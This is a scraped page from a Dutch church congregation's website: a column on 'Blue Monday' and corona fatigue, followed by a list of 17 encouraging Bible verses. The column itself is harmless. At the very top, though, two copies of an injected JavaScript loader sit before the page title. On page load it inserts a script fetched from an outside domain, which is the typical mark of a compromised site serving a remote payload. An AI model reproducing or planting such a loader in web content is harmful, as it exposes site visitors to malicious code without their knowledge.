;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Blue Monday - deprimaandag - PKN Damwâld

Blue Monday – deprimaandag

Gepubliceerd op: maandag 1 februari 2021

Blue Monday staat voor de meest deprimerende dag van het jaar: het is koud, donker, er is nog geen zicht op vakantie, je goede voornemens zijn mislukt, je hebt nog geen salaris ontvangen en de uitgaven in december staan nog vers in je geheugen. Nu heb ik daar eerlijk gezegd meestal weinig last van, maar ik ben de laatste tijd wel iets minder fleurig dan anders. Misschien is het ‘coronamoeheid’, het lusteloze gevoel dat er niets kan en niets mag, wat ook in het kerkenwerk zijn sporen nalaat. Het gevoel van ‘hoe lang nog’, en ‘houden we dit vol?’, ‘Wat doet dit met mensen, met ons gemeente-zijn?’
Gelukkig staat de Bijbel vol met mooie en bemoedigende teksten over vertrouwen, kracht, hoop en rust. God is altijd bij je! Daarom deel ik deze teksten graag met jullie allemaal, als hart onder de riem en als lichtpuntje in donkere dagen.

Janet

[Bron: Lifelinemagazine.nl]
God is altijd bij je
De grootste bemoediging putten christenen uit het feit dat God bij je is én blijft, ook op moeilijke momenten. In de Psalmen lees je over de rauwe worsteling met lijden, die misschien herkenbaar voor je is. Toch weten de psalmisten dat God erbij is, midden in hun pijn en duisternis. “Al gaat mijn weg door een donker dal, ik vrees geen gevaar, want U bent bij mij, Uw stok en Uw staf, zij geven mij moed,” schrijft de psalmist in Psalm 23:4. In het Nieuwe Testament krijgt Jezus de bijzondere naam Immanuel, wat betekent ‘God met ons’ (Matteüs 1:23). Een mooie belofte!
Hoe groot het leed en verdriet ook is, de Bijbel belooft steeds opnieuw dat er toekomst is. Voor veel christenen is de belofte van Gods koninkrijk – Gods nieuwe wereld – een grote troost: “Hij zal alle tranen uit hun ogen wissen. Er zal geen dood meer zijn, geen rouw, geen jammerklacht, geen pijn, want alles wat er eerst was, is voorbij.” Als dat geen hoopvolle en bemoedigende Bijbeltekst is!

17 bemoedigende Bijbelteksten
Lees hier hoopvolle en bemoedigende Bijbelteksten voor allerlei situaties.

1. Ik ben moe
Kom naar Mij, jullie die vermoeid zijn en onder lasten gebukt gaan, dan zal Ik jullie rust geven. Mattheüs 11:28
2. Ik heb een mooie dag!
Voor wie tevreden is met wat hij heeft, is het geloof grote winst. 1 Timoteüs 6:6
3. Dit is toch onmogelijk?
Jezus zei: ‘Wat bij de mensen onmogelijk is, is mogelijk bij God.’ Lukas 18:27
4. Wie houdt er echt van mij?
Jij bent zo kostbaar in mijn ogen, zo waardevol, en Ik houd zo veel van je dat Ik de mensheid geef in ruil voor jou. Jesaja 43:4
5. Ik heb er de kracht niet meer voor
‘Je hebt niet meer dan Mijn genade nodig, want kracht wordt zichtbaar in zwakheid.’ Dus laat ik mij veel liever voorstaan op mijn zwakheid, zodat de kracht van Christus in mij zichtbaar wordt. Omdat Christus mij kracht schenkt, schep ik vreugde in mijn zwakheid: in beledigingen, nood, vervolging en ellende. In mijn zwakheid ben ik sterk. 2 Korinthiërs 12:9-10
6. Ik ben de draad kwijt
De weg van een mens wordt bepaald door de HEER. Spreuken 20:24
7. Ik kan het niet aan
Ik ben tegen alles bestand door Hem die mij kracht geeft. Filippenzen 4:13
8. Ik zoek een schuilplaats
Proef, en geniet de goedheid van de HEER, gelukkig de mens die bij Hem schuilt. Psalmen 34:9
9. Ik ben er niet toe in staat
God heeft de macht u te overstelpen met al Zijn gaven, zodat u altijd en in alle opzichten voldoende voor uzelf hebt en ook nog ruimschoots kunt bijdragen aan allerlei goed werk. 2 Korinthiërs 9:8
10. Zou het de moeite wel waard zijn?
En wij weten dat voor wie God liefhebben, voor wie volgens Zijn voornemen geroepen zijn, alles bijdraagt aan het goede. Romeinen 8:28
11. Ik kan mezelf niet vergeven
Hij is gestorven om een einde te maken aan de zonde, voor eens en altijd; en nu Hij leeft, leeft Hij voor God. Zo moet u ook uzelf zien: dood voor de zonde, maar in Christus Jezus levend voor God. Romeinen 6:10-11
12. Hoe moet alles nu toch goed komen?
Mijn God zal uit de overvloed van Zijn majesteit elk tekort van u aanvullen, door Christus Jezus. Aan onze God en Vader komt de eer toe tot in alle eeuwigheid. Filippenzen 4:19
13. Ik vind het eng om die stap te zetten
God heeft ons niet een geest van lafhartigheid gegeven, maar een geest van kracht, liefde en bezonnenheid. 2 Timotheüs 1:7
14. Ik voel me bezorgd en gefrustreerd
U mag uw zorgen op Hem afwentelen, want u ligt Hem na aan het hart. 1 Petrus 5:7
15. Ik denk dat ik te weinig geloof heb
Maar de Heer is trouw, hij zal u kracht geven en u tegen het kwaad beschermen. 2 Tessalonicenzen 3:3
16. Wat heb ik eigenlijk te bieden?
Door Hem bent u één met Christus Jezus, die dankzij God onze wijsheid is geworden. 1 Korinthiërs 1:30
17. Ik sta er helemaal alleen voor
Hij heeft immers zelf gezegd: ‘Nooit zal Ik u afvallen, nooit zal Ik u verlaten,’ zodat we vol vertrouwen kunnen zeggen: ‘De Heer is mijn helper, ik heb niets te vrezen. Wat zouden mensen mij kunnen doen?’ Hebreeën 13:5-6

Columnist:Janet

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns